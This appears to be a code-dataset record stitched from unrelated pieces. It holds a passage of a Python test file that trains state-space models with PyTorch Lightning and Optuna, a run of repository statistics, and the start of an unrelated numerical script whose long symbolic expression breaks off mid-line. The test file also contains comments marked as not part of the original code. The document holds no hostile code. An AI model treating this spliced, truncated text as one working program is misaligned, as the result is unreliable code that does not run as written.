parser.add_argument('--bs', default=600, type=int, help='batch size')
parser.add_argument('--fold', default=fold, type=int)
parser.add_argument('--ss_missing', type=strtobool, default=False, help='whether to add missing data in semi synthetic setup or not')
parser.add_argument('--ss_in_sample_dist', type=strtobool, default=False, help='whether to use mm training patients to generate validation/test set in semi synthetic data')
parser.add_argument('--att_mask', type=strtobool, default=False, help='set to True for SSMAtt and FOMMAtt')
# THIS LINE IS KEY TO PULL THE MODEL NAME
temp_args, _ = parser.parse_known_args()
# add rest of args from SSM and base trainer
parser = SSM.add_model_specific_args(parser)
parser = Trainer.add_argparse_args(parser)
# parse args and convert to dict
args = parser.parse_args()
args.max_epochs = 15000
args.ttype = ttype
args.alpha1_type = 'linear'
args.add_stochastic = False
# args.C = 0.1; args.reg_all = True; args.reg_type = 'l1'
args.C = C; args.reg_all = reg_all; args.reg_type = reg_type
# fold 0,1,2,4: .01, True, 'l1' (everything )
# fold 3: .01, False, 'l1'
args.dim_stochastic = ds
args.dim_hidden = dh
dict_args = vars(args)
# initialize FOMM w/ args and train
trial = optuna.trial.FixedTrial({'bs': args.bs, 'lr': args.lr, 'C': args.C, 'reg_all': args.reg_all, 'reg_type': args.reg_type, 'dim_stochastic': args.dim_stochastic})
model = SSM(trial, **dict_args)
checkpoint_callback = ModelCheckpoint(filepath='./checkpoints/mmfold' + str(fold) + '_ssm_' + ttype + '_{epoch:05d}-{val_loss:.2f}')
trainer = Trainer.from_argparse_args(args, deterministic=True, logger=False, checkpoint_callback=checkpoint_callback, gpus=[2])
trainer.fit(model)
def test_ssm_gated_mm(fold=1, reg_all=True, C=0.01, reg_type='l2'):
print(f'[FOLD: {fold}, REG_ALL: {reg_all}]')
seed_everything(0)
parser = ArgumentParser()
parser.add_argument('--model_name', type=str, default='ssm', help='fomm, ssm, or gru')
parser.add_argument('--lr', type=float, default=1e-3, help='learning rate')
parser.add_argument('--anneal', type=float, default=1., help='annealing rate')
parser.add_argument('--fname', type=str, help='name of save file')
parser.add_argument('--imp_sampling', type=bool, default=False, help='importance sampling to estimate marginal likelihood')
parser.add_argument('--nsamples', default=1, type=int)
parser.add_argument('--nsamples_syn', default=100, type=int, help='number of training samples for synthetic data')
parser.add_argument('--optimizer_name', type=str, default='adam')
parser.add_argument('--dataset', default='mm', type=str)
parser.add_argument('--eval_type', type=str, default='nelbo')
parser.add_argument('--loss_type', type=str, default='unsup')
parser.add_argument('--bs', default=600, type=int, help='batch size')
parser.add_argument('--fold', default=fold, type=int)
parser.add_argument('--ss_missing', type=strtobool, default=False, help='whether to add missing data in semi synthetic setup or not')
parser.add_argument('--ss_in_sample_dist', type=strtobool, default=False, help='whether to use mm training patients to generate validation/test set in semi synthetic data')
parser.add_argument('--att_mask', type=strtobool, default=False, help='set to True for SSMAtt and FOMMAtt')
# THIS LINE IS KEY TO PULL THE MODEL NAME
temp_args, _ = parser.parse_known_args()
# add rest of args from SSM and base trainer
parser = SSM.add_model_specific_args(parser)
parser = Trainer.add_argparse_args(parser)
# parse args and convert to dict
args = parser.parse_args()
args.max_epochs = 15000
args.ttype = 'attn_transition'
args.alpha1_type = 'linear'
args.add_stochastic = False
# args.C = 0.1; args.reg_all = True; args.reg_type = 'l1'
args.C = C; args.reg_all = reg_all; args.reg_type = reg_type
# fold 0,1,2,4: .01, True, 'l1' (everything )
# fold 3: .01, False, 'l1'
args.dim_stochastic = 48
dict_args = vars(args)
# initialize FOMM w/ args and train
trial = optuna.trial.FixedTrial({'bs': args.bs, 'lr': args.lr, 'C': args.C, 'reg_all': args.reg_all, 'reg_type': args.reg_type, 'dim_stochastic': args.dim_stochastic})
model = SSM(trial, **dict_args)
checkpoint_callback = ModelCheckpoint(filepath='./checkpoints/mmfold' + str(fold) + 'ssm_ablation_noTELC_test{epoch:05d}-{val_loss:.2f}')
trainer = Trainer.from_argparse_args(args, deterministic=True, logger=False, checkpoint_callback=checkpoint_callback, gpus=[3])
trainer.fit(model)
# evaluate on validation set; this should match what we were getting with the old codebase (after 100 epochs)
# if torch.cuda.is_available():
# device = torch.device('cuda:3')
# else:
# device = torch.device('cpu')
# _, valid_loader = model.load_helper('valid', device=device)
# (nelbo, nll, kl, _), _ = model.forward(*valid_loader.dataset.tensors, anneal = 1.)
# print(f'nelbo: {nelbo}')
# assert (nelbo.item() - 230) < 3e-1
def test_ssm_linear_syn():
seed_everything(0)
parser = ArgumentParser()
parser.add_argument('--model_name', type=str, default='ssm', help='fomm, ssm, or gru')
parser.add_argument('--lr', type=float, default=1e-3, help='learning rate')
parser.add_argument('--anneal', type=float, default=1., help='annealing rate')
parser.add_argument('--fname', type=str, help='name of save file')
parser.add_argument('--imp_sampling', type=bool, default=False, help='importance sampling to estimate marginal likelihood')
parser.add_argument('--nsamples', default=1, type=int)
parser.add_argument('--nsamples_syn', default=100, type=int, help='number of training samples for synthetic data')
parser.add_argument('--optimizer_name', type=str, default='adam')
parser.add_argument('--dataset', default='synthetic', type=str)
parser.add_argument('--eval_type', type=str, default='nelbo')
parser.add_argument('--loss_type', type=str, default='semisup')
parser.add_argument('--bs', default=600, type=int, help='batch size')
parser.add_argument('--fold', default=1, type=int)
parser.add_argument('--ss_missing', type=strtobool, default=False, help='whether to add missing data in semi synthetic setup or not')
parser.add_argument('--ss_in_sample_dist', type=strtobool, default=False, help='whether to use mm training patients to generate validation/test set in semi synthetic data')
# THIS LINE IS KEY TO PULL THE MODEL NAME
temp_args, _ = parser.parse_known_args()
# add rest of args from SSM and base trainer
parser = SSM.add_model_specific_args(parser)
parser = Trainer.add_argparse_args(parser)
# parse args and convert to dict
args = parser.parse_args()
args.max_epochs = 100
dict_args = vars(args)
# initialize FOMM w/ args and train
model = SSM(**dict_args)
trainer = Trainer.from_argparse_args(args, deterministic=True, logger=False, checkpoint_callback=False, gpus=[3])
trainer.fit(model)
# evaluate on validation set; this should match what we were getting with the old codebase (after 100 epochs)
if torch.cuda.is_available():
device = torch.device('cuda:1')
else:
device = torch.device('cpu')
_, valid_loader = model.load_helper('valid', device=device)
(nelbo, nll, kl, _), _ = model.forward(*valid_loader.dataset.tensors, anneal = 1.)
    assert abs(nelbo.item() - 191) < 3e-1
def test_sota_mm_semi():
seed_everything(0)
parser = ArgumentParser()
parser.add_argument('--model_name', type=str, default='ssm', help='fomm, ssm, or gru')
parser.add_argument('--lr', type=float, default=1e-3, help='learning rate')
parser.add_argument('--anneal', type=float, default=1., help='annealing rate')
parser.add_argument('--fname', type=str, help='name of save file')
parser.add_argument('--imp_sampling', type=bool, default=False, help='importance sampling to estimate marginal likelihood')
parser.add_argument('--nsamples', default=1, type=int)
parser.add_argument('--nsamples_syn', default=100, type=int, help='number of training samples for synthetic data')
parser.add_argument('--optimizer_name', type=str, default='adam')
parser.add_argument('--dataset', default='mm', type=str)
parser.add_argument('--eval_type', type=str, default='nelbo')
parser.add_argument('--loss_type', type=str, default='unsup')
parser.add_argument('--bs', default=600, type=int, help='batch size')
parser.add_argument('--fold', default=1, type=int)
parser.add_argument('--ss_missing', type=strtobool, default=False, help='whether to add missing data in semi synthetic setup or not')
parser.add_argument('--ss_in_sample_dist', type=strtobool, default=False, help='whether to use mm training patients to generate validation/test set in semi synthetic data')
# THIS LINE IS KEY TO PULL THE MODEL NAME
temp_args, _ = parser.parse_known_args()
# add rest of args from SSM and base trainer
parser = SSM.add_model_specific_args(parser)
parser = Trainer.add_argparse_args(parser)
# parse args and convert to dict
args = parser.parse_args()
args.max_epochs = 10000
args.ttype = 'gated'
args.alpha1_type = 'linear'
args.add_stochastic = False
dict_args = vars(args)
trial = optuna.trial.FixedTrial({'lr': args.lr, 'C': args.C, 'reg_all': args.reg_all, 'reg_type': args.reg_type, 'dim_stochastic': 48})
model = SSM(trial, **dict_args)
    # import pdb; pdb.set_trace()  # leftover debugging breakpoint; would halt the run if left active
trainer = Trainer.from_argparse_args(args, deterministic=True, logger=False, \
checkpoint_callback=False, gpus=[1], \
resume_from_checkpoint='/afs/csail.mit.edu/u/z/zeshanmh/research/ief/ief_core/tbp_logs/checkpoints/ssm_mm_sota_fold1_epoch=13743-val_loss=66.07.ckpt')
# automatically restores model, epoch, step, LR schedulers, apex, etc...
trainer.fit(model)
if torch.cuda.is_available():
device = torch.device('cuda:1')
else:
device = torch.device('cpu')
_, valid_loader = model.load_helper('valid', device=device)
(nelbo, nll, kl, _), _ = model.forward(*valid_loader.dataset.tensors, anneal = 1.)
print(f'nelbo: {nelbo}')
def test_ssm_gated_syn(ttype='attn_transition', num_samples=1000):
seed_everything(0)
parser = ArgumentParser()
parser.add_argument('--model_name', type=str, default='ssm', help='fomm, ssm, or gru')
parser.add_argument('--lr', type=float, default=1e-3, help='learning rate')
parser.add_argument('--anneal', type=float, default=1., help='annealing rate')
parser.add_argument('--fname', type=str, help='name of save file')
parser.add_argument('--imp_sampling', type=bool, default=False, help='importance sampling to estimate marginal likelihood')
parser.add_argument('--nsamples', default=1, type=int)
parser.add_argument('--nsamples_syn', default=1000, type=int, help='number of training samples for synthetic data')
parser.add_argument('--optimizer_name', type=str, default='adam')
parser.add_argument('--dataset', default='semi_synthetic', type=str)
parser.add_argument('--eval_type', type=str, default='nelbo')
parser.add_argument('--loss_type', type=str, default='semisup')
parser.add_argument('--bs', default=1500, type=int, help='batch size')
parser.add_argument('--fold', default=1, type=int)
parser.add_argument('--ss_missing', type=strtobool, default=False, help='whether to add missing data in semi synthetic setup or not')
parser.add_argument('--ss_in_sample_dist', type=strtobool, default=True, help='whether to use mm training patients to generate validation/test set in semi synthetic data')
parser.add_argument('--att_mask', type=strtobool, default=False, help='set to True for SSMAtt and FOMMAtt')
# THIS LINE IS KEY TO PULL THE MODEL NAME
temp_args, _ = parser.parse_known_args()
# add rest of args from SSM and base trainer
parser = SSM.add_model_specific_args(parser)
parser = Trainer.add_argparse_args(parser)
# parse args and convert to dict
args = parser.parse_args()
args.max_epochs = 1000
args.nsamples_syn = num_samples
args.ttype = ttype
args.alpha1_type = 'linear'
args.add_stochastic = False
dict_args = vars(args)
args.C = 0.01; args.reg_all = True; args.reg_type = 'l2'
# fold 0,1,2,4: .01, True, 'l1' (everything )
# fold 3: .01, False, 'l1'
args.dim_stochastic = 128
# initialize SSM w/ args and train
trial = optuna.trial.FixedTrial({'bs': args.bs, 'lr': args.lr, 'C': args.C, 'reg_all': args.reg_all, 'reg_type': args.reg_type, 'dim_stochastic': args.dim_stochastic})
model = SSM(trial, **dict_args)
checkpoint_callback = ModelCheckpoint(filepath='./checkpoints/ssm_semi_syn_' + ttype + '_' + str(args.nsamples_syn) + 'sample_complexity{epoch:05d}-{val_loss:.2f}')
trainer = Trainer.from_argparse_args(args, deterministic=True, logger=False, checkpoint_callback=checkpoint_callback, gpus=[0])
trainer.fit(model)
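# (Hedged aside, not part of the original test:) optuna.trial.FixedTrial replays a
# fixed hyperparameter dictionary through the model's trial.suggest_* calls without
# launching a study, which is why these tests can reuse the Optuna-based model
# constructor with hand-picked values. A minimal illustration (exact suggest method
# names depend on the Optuna version):
#   trial = optuna.trial.FixedTrial({'lr': 1e-3})
#   trial.suggest_float('lr', 1e-5, 1e-1)  # -> 1e-3, the pinned value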
def test_ssm_lin_syn(ttype='lin'):
seed_everything(0)
parser = ArgumentParser()
parser.add_argument('--model_name', type=str, default='ssm', help='fomm, ssm, or gru')
parser.add_argument('--lr', type=float, default=1e-3, help='learning rate')
parser.add_argument('--anneal', type=float, default=1., help='annealing rate')
parser.add_argument('--fname', type=str, help='name of save file')
parser.add_argument('--imp_sampling', type=bool, default=False, help='importance sampling to estimate marginal likelihood')
parser.add_argument('--nsamples', default=1, type=int)
parser.add_argument('--nsamples_syn', default=100, type=int, help='number of training samples for synthetic data')
parser.add_argument('--optimizer_name', type=str, default='adam')
parser.add_argument('--dataset', default='synthetic', type=str)
parser.add_argument('--eval_type', type=str, default='nelbo')
parser.add_argument('--loss_type', type=str, default='unsup')
parser.add_argument('--bs', default=600, type=int, help='batch size')
parser.add_argument('--fold', default=1, type=int)
parser.add_argument('--ss_missing', type=strtobool, default=False, help='whether to add missing data in semi synthetic setup or not')
parser.add_argument('--ss_in_sample_dist', type=strtobool, default=True, help='whether to use mm training patients to generate validation/test set in semi synthetic data')
parser.add_argument('--att_mask', type=strtobool, default=False, help='set to True for SSMAtt and FOMMAtt')
# THIS LINE IS KEY TO PULL THE MODEL NAME
temp_args, _ = parser.parse_known_args()
# add rest of args from SSM and base trainer
parser = SSM.add_model_specific_args(parser)
parser = Trainer.add_argparse_args(parser)
# parse args and convert to dict
args = parser.parse_args()
args.max_epochs = 15000
args.ttype = ttype
args.alpha1_type = 'linear'
args.add_stochastic = False
dict_args = vars(args)
args.C = 0.01; args.reg_all = True; args.reg_type = 'l2'
# fold 0,1,2,4: .01, True, 'l1' (everything )
# fold 3: .01, False, 'l1'
args.dim_stochastic = 48
# initialize SSM w/ args and train
trial = optuna.trial.FixedTrial({'bs': args.bs, 'lr': args.lr, 'C': args.C, 'reg_all': args.reg_all, 'reg_type': args.reg_type, 'dim_stochastic': args.dim_stochastic})
model = SSM(trial, **dict_args)
checkpoint_callback = ModelCheckpoint(filepath='./checkpoints/ssm_syn_' + ttype + '500samp_{epoch:05d}-{val_loss:.2f}')
trainer = Trainer.from_argparse_args(args, deterministic=True, logger=False, checkpoint_callback=checkpoint_callback, gpus=[0])
trainer.fit(model)
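# (Hedged aside, not part of the original test:) the boolean flags above use
# distutils.util.strtobool as the argparse `type`, which maps strings such as
# "true"/"False"/"1" to 1 or 0 and raises on anything else, e.g.:
#   from distutils.util import strtobool
#   strtobool('False')  # -> 0
# Note that --imp_sampling instead uses type=bool, which in argparse treats any
# non-empty string (including "False") as truthy; it is only harmless here because
# the flag is never overridden on the command line.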
def test_ssm_nl_syn(ttype='nl'):
seed_everything(0)
parser = ArgumentParser()
parser.add_argument('--model_name', type=str, default='ssm', help='fomm, ssm, or gru')
parser.add_argument('--lr', type=float, default=1e-3, help='learning rate')
parser.add_argument('--anneal', type=float, default=1., help='annealing rate')
parser.add_argument('--fname', type=str, help='name of save file')
parser.add_argument('--imp_sampling', type=bool, default=False, help='importance sampling to estimate marginal likelihood')
parser.add_argument('--nsamples', default=1, type=int)
parser.add_argument('--nsamples_syn', default=100, type=int, help='number of training samples for synthetic data')
parser.add_argument('--optimizer_name', type=str, default='adam')
parser.add_argument('--dataset', default='synthetic', type=str)
parser.add_argument('--eval_type', type=str, default='nelbo')
parser.add_argument('--loss_type', type=str, default='semisup')
parser.add_argument('--bs', default=600, type=int, help='batch size')
parser.add_argument('--fold', default=1, type=int)
parser.add_argument('--ss_missing', type=strtobool, default=False, help='whether to add missing data in semi synthetic setup or not')
parser.add_argument('--ss_in_sample_dist', type=strtobool, default=True, help='whether to use mm training patients to generate validation/test set in semi synthetic data')
parser.add_argument('--att_mask', type=strtobool, default=False, help='set to True for SSMAtt and FOMMAtt')
# THIS LINE IS KEY TO PULL THE MODEL NAME
temp_args, _ = parser.parse_known_args()
# add rest of args from SSM and base trainer
parser = SSM.add_model_specific_args(parser)
parser = Trainer.add_argparse_args(parser)
# parse args and convert to dict
args = parser.parse_args()
args.max_epochs = 15000
args.ttype = ttype
args.alpha1_type = 'linear'
args.add_stochastic = False
dict_args = vars(args)
args.C = 0.01; args.reg_all = True; args.reg_type = 'l2'
# fold 0,1,2,4: .01, True, 'l1' (everything )
# fold 3: .01, False, 'l1'
args.dim_stochastic = 48
# initialize SSM w/ args and train
trial = optuna.trial.FixedTrial({'bs': args.bs, 'lr': args.lr, 'C': args.C, 'reg_all': args.reg_all, 'reg_type': args.reg_type, 'dim_stochastic': args.dim_stochastic})
model = SSM(trial, **dict_args)
checkpoint_callback = ModelCheckpoint(filepath='./checkpoints/ssm_syn_' + ttype + '500samp_{epoch:05d}-{val_loss:.2f}')
trainer = Trainer.from_argparse_args(args, deterministic=True, logger=False, checkpoint_callback=checkpoint_callback, gpus=[0])
trainer.fit(model)
# evaluate on validation set; this should match what we were getting with the old codebase (after 100 epochs)
# if torch.cuda.is_available():
# device = torch.device('cuda:1')
# else:
# device = torch.device('cpu')
# _, valid_loader = model.load_helper('valid', device=device)
# (nelbo, nll, kl, _), _ = model.forward(*valid_loader.dataset.tensors, anneal = 1.)
# assert (nelbo.item() - 166) < 3e-1
def test_ssm_syn_nolc():
seed_everything(0)
parser = ArgumentParser()
parser.add_argument('--model_name', type=str, default='ssm', help='fomm, ssm, or gru')
parser.add_argument('--lr', type=float, default=1e-3, help='learning rate')
parser.add_argument('--anneal', type=float, default=1., help='annealing rate')
parser.add_argument('--fname', type=str, help='name of save file')
parser.add_argument('--imp_sampling', type=bool, default=False, help='importance sampling to estimate marginal likelihood')
parser.add_argument('--nsamples', default=1, type=int)
parser.add_argument('--nsamples_syn', default=1000, type=int, help='number of training samples for synthetic data')
parser.add_argument('--optimizer_name', type=str, default='adam')
parser.add_argument('--dataset', default='synthetic', type=str)
parser.add_argument('--eval_type', type=str, default='nelbo')
parser.add_argument('--loss_type', type=str, default='semisup')
parser.add_argument('--bs', default=600, type=int, help='batch size')
parser.add_argument('--fold', default=1, type=int)
parser.add_argument('--ss_missing', type=strtobool, default=False, help='whether to add missing data in semi synthetic setup or not')
parser.add_argument('--ss_in_sample_dist', type=strtobool, default=False, help='whether to use mm training patients to generate validation/test set in semi synthetic data')
parser.add_argument('--att_mask', type=strtobool, default=False, help='set to True for SSMAtt and FOMMAtt')
#parser.add_argument('--clock_ablation', type=strtobool, default=True, help='set to True for SSMAtt and FOMMAtt')
# THIS LINE IS KEY TO PULL THE MODEL NAME
temp_args, _ = parser.parse_known_args()
# add rest of args from SSM and base trainer
parser = SSM.add_model_specific_args(parser)
parser = Trainer.add_argparse_args(parser)
# parse args and convert to dict
args = parser.parse_args()
args.max_epochs = 15000
args.ttype = 'attn_transition'
args.alpha1_type = 'linear'
args.add_stochastic = False
args.clock_ablation = True
dict_args = vars(args)
args.C = 0.01; args.reg_all = False; args.reg_type = 'l2'
# fold 0,1,2,4: .01, True, 'l1' (everything )
# fold 3: .01, False, 'l1'
args.dim_stochastic = 48
# initialize SSM w/ args and train
trial = optuna.trial.FixedTrial({'bs': args.bs, 'lr': args.lr, 'C': args.C, 'reg_all': args.reg_all, 'reg_type': args.reg_type, 'dim_stochastic': args.dim_stochastic})
model = SSM(trial, **dict_args)
checkpoint_callback = ModelCheckpoint(filepath='./checkpoints/ssm_syn_nolc{epoch:05d}-{val_loss:.2f}')
trainer = Trainer.from_argparse_args(args, deterministic=True, logger=False, checkpoint_callback=checkpoint_callback, gpus=[0])
trainer.fit(model)
# evaluate on validation set; this should match what we were getting with the old codebase (after 100 epochs)
# if torch.cuda.is_available():
# device = torch.device('cuda:1')
# else:
# device = torch.device('cpu')
# _, valid_loader = model.load_helper('valid', device=device)
# (nelbo, nll, kl, _), _ = model.forward(*valid_loader.dataset.tensors, anneal = 1.)
# assert (nelbo.item() - 166) < 3e-1
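# (Hedged aside, not in the original:) every test pins randomness the same way:
# seed_everything(0) seeds Python, NumPy and torch, and Trainer(deterministic=True)
# asks PyTorch Lightning to prefer deterministic CUDA kernels, so repeated runs of a
# given config should reproduce the same loss curves up to ops that have no
# deterministic implementation.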
if __name__ == '__main__':
    samples = [20000]
    for ss in samples:
        test_ssm_gated_syn(ttype='attn_transition', num_samples=ss)
        test_ssm_gated_syn(ttype='lin', num_samples=ss)
        test_ssm_gated_syn(ttype='nl', num_samples=ss)
        test_ssm_gated_syn(ttype='moe', num_samples=ss)
    # configs = ['attn_transition', 'lin', 'nl']
    # for config in configs:
    #     test_ssm_gated_syn(ttype=config)
    # configs = [(0, 0.01, True, 'l2'), (1, 0.1, True, 'l2'), (2, 0.01, False, 'l1'), (3, 0.1, True, 'l2'), (4, 0.01, False, 'l2')]
    # for config in configs:
    #     fold, C, reg_all, reg_type = config
    #     test_ssm_gated_mm(fold=fold, reg_all=reg_all, C=C, reg_type=reg_type)
    #     if fold != 3:
    #         test_ssm_gated_mm(fold, True)
    #     else:
    #         test_ssm_gated_mm(fold, False)
| 55.918345
| 232
| 0.685363
| 7,175
| 49,991
| 4.602927
| 0.051847
| 0.059953
| 0.113244
| 0.015261
| 0.909162
| 0.901774
| 0.897263
| 0.89481
| 0.886756
| 0.883122
| 0
| 0.032319
| 0.170011
| 49,991
| 893
| 233
| 55.980963
| 0.763641
| 0.157288
| 0
| 0.800933
| 0
| 0.009331
| 0.238056
| 0.017348
| 0
| 0
| 0
| 0
| 0.010886
| 1
| 0.024883
| false
| 0
| 0.055988
| 0
| 0.080871
| 0.027994
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ace09f44229c99d57942130892e4f0ccc4bd59aa
| 48,786
|
py
|
Python
|
examples/Nolan/AFRL/Carts/SpeedTest4.py
|
Rapid-Design-of-Systems-Laboratory/beluga-legacy
|
d14713d8211b64293c4427005cf02fbd58630598
|
[
"MIT"
] | 1
|
2019-03-26T03:00:03.000Z
|
2019-03-26T03:00:03.000Z
|
examples/Nolan/AFRL/Carts/SpeedTest4.py
|
Rapid-Design-of-Systems-Laboratory/beluga-legacy
|
d14713d8211b64293c4427005cf02fbd58630598
|
[
"MIT"
] | null | null | null |
examples/Nolan/AFRL/Carts/SpeedTest4.py
|
Rapid-Design-of-Systems-Laboratory/beluga-legacy
|
d14713d8211b64293c4427005cf02fbd58630598
|
[
"MIT"
] | 1
|
2019-07-14T22:53:52.000Z
|
2019-07-14T22:53:52.000Z
|
import numpy as np
from beluga.utils.math import *
from beluga.utils.tictoc import *
tf = 1
Dt = 0.1
sigv = 0.1
sigw = 0.1
sigr = 0.1
w = 3.1415/2
xb = 5
yb = 5
u_max = 0.1
v = 30
x_n = 100
y_n = 1e-4
theta_n = 0.1
p11_n = 1e5
p12_n = 1e5
p13_n = 1e5
p22_n = 1e5
p23_n = 1e5
p33_n = 1e5
lamX_N = 50
lamY_N = -100
lamTHETA_N = 2
lamP11_N = 1
lamP12_N = 1
lamP13_N = 1
lamP22_N = 1
lamP23_N = 1
lamP33_N = 1
x_s = 1
y_s = 1
theta_s = 1
p11_s = 1e-3
p12_s = 1e-3
p13_s = 1e-3
p22_s = 1e-1
p23_s = 1e-2
p33_s = 1e-3
ep = 5
tic()
for i in range(1000):
fx = np.array([
(tf)*(-lamP11_N*(p11_n*p11_s*x_s*(x_n*x_s - xb)**2*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p11_n*p11_s*x_s*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p11_n*p11_s*(x_n*x_s - xb)*(-p11_n*p11_s*x_s*(x_n*x_s - xb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p11_n*p11_s*x_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) - p12_n*p12_s*x_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) + p12_n*p12_s*x_s*(x_n*x_s - xb)*(y_n*y_s - yb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p12_n*p12_s*(y_n*y_s - yb)*(-p11_n*p11_s*x_s*(x_n*x_s - xb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p11_n*p11_s*x_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) - p12_n*p12_s*x_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p11_s - lamP12_N*(p12_n*p12_s*x_s*(x_n*x_s - xb)**2*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p12_n*p12_s*x_s*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p12_n*p12_s*(x_n*x_s - xb)*(-p11_n*p11_s*x_s*(x_n*x_s - xb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p11_n*p11_s*x_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) - p12_n*p12_s*x_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) + p22_n*p22_s*x_s*(x_n*x_s - xb)*(y_n*y_s - yb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p22_n*p22_s*(y_n*y_s - yb)*(-p11_n*p11_s*x_s*(x_n*x_s - xb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p11_n*p11_s*x_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) - p12_n*p12_s*x_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p12_s - lamP13_N*(p13_n*p13_s*x_s*(x_n*x_s - xb)**2*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p13_n*p13_s*x_s*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p13_n*p13_s*(x_n*x_s - xb)*(-p11_n*p11_s*x_s*(x_n*x_s - xb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p11_n*p11_s*x_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) - p12_n*p12_s*x_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2))/(Dt*sigr**2*sqrt((x_n*x_s - 
